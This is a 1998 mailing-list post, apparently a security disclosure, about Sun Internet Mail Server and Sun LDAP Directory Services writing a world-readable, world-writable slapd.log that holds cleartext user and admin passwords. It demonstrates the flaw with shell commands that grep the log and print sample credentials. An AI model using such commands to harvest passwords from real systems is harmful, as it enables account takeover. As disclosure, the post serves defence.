Date: Fri, 25 Dec 1998 19:51:56 PST
From: Dana Jones <[email protected]>
To: [email protected]Subject: Vulnerability
SIMS 3.x (Sun Internet Mail Server) and SDS 1.x & 3.1 (Sun LDAP
Directory services) vulnerability.
/var/opt/SUNWconn/ldap/log/slapd.log is used to log ldap
connects/operations.
I won't waste a lot of typing on detailing the problem, perhaps this
simple example will suffice:
% cd /var/opt/SUNWconn/ldap/log/
% ls -l slapd.log
-rw-rw-rw- 1 root root 33519 Dec 16 16:00 slapd.log
% grep password slapd.log
Wed Dec 16 12:55 : conn=41 op=2 SRCH base="CN=Joe T. User
(joet),OU=People,O=email,C=US" scope=2 filter="(userpassword=bettysue)"
% grep passwd | grep admin
Wed Dec 16 12:55 : conn=41 op=2 SRCH base="CN=admin
(admin),OU=People,O=email,C=US" scope=2 filter="(userpassword=secret)"
<sigh> yes folks, world readable (and writable for that matter) and
clear text passwords and uids of all those folks logging into the IMAP
server to check mail, etc. and on a machine that users can log into.
Almost takes all the fun out of it.
______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com
